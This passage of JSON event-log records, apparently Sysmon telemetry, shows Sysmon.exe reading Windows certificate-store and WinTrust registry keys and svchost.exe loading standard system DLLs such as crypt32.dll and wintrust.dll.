"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877460000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { 
- "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bitsperf.dll", - "image_path": "C:\\Windows\\System32\\bitsperf.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877610000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
